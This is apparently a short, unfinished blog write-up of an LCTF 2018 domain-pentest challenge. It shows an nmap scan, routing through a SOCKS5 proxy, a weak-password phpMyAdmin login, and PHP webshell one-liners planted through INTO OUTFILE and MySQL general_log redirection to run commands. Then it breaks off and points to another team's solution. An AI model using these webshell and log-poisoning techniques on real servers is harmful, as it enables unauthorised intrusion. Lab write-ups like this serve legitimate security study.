lctf2018-god of domain pentest


question

题目描述:
windows域环境权限不好配,还请各位师傅高抬贵手,不要搅屎 
c段只用到了0-20,不需要扫21-255,端口也只开放了常用端口。 
web.lctf.com中有个域用户是web.lctf.com\buguake,密码是172.21.0.8的本地管理员密码 

188.131.161.90

nmap scan in first.Recent web pentest like to give socks5

➜  ubuntu nmap -p 1000-1100 188.131.161.90

Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-20 00:50 CST
Nmap scan report for 188.131.161.90
Host is up (0.048s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
1083/tcp open  ansoft-lm-1
1084/tcp open  ansoft-lm-2
1088/tcp open  cplscrambler-al
1089/tcp open  ff-annunc

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

go with proxy!

export all_proxy=socks5://188.131.161.90:1083

Visit http://172.21.0.1

Hello World

try for http://172.21.0.1/phpinfo.php
phpinfo

found it with phpstudy,try login phpmyadmin with weak password

root 
root phpmyadmin
root root

use general_log

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'c:/phpStudy/PHPTutorial/WWW/cmd.php'

result

#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

change way

set global general_log='on';
SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/xyzz1.php';
SELECT '<?php assert($_GET["cmd"]);?>';

get webshell~~~

visit it

http://172.21.0.8/xyzz1.php?cmd=system(%22whoami%22)
C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: TCP Port: 3306, Named Pipe: MySQL Time Id Command Argument 364 Init DB    mysql 364 Query    SELECT 'pupiles-pc\administrator ' 364 Query    SHOW TABLE STATUS FROM `mysql` LIKE 'general\_log%' 364 Query SELECT COUNT(*) FROM `mysql`.`general_log` 364 Query    SHOW CREATE TABLE `mysql`.`general_log` 364 Quit

emmm,the website is closed.give up!
from Nu1L’s wp,next with ms17-010 ,ms14-068—-
Nu1L’s wp:[wp]https://xz.aliyun.com/t/3341#toc-18


文章作者: xyzz
文章链接: http://www.xyzzpwn.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 xyzz !
  目录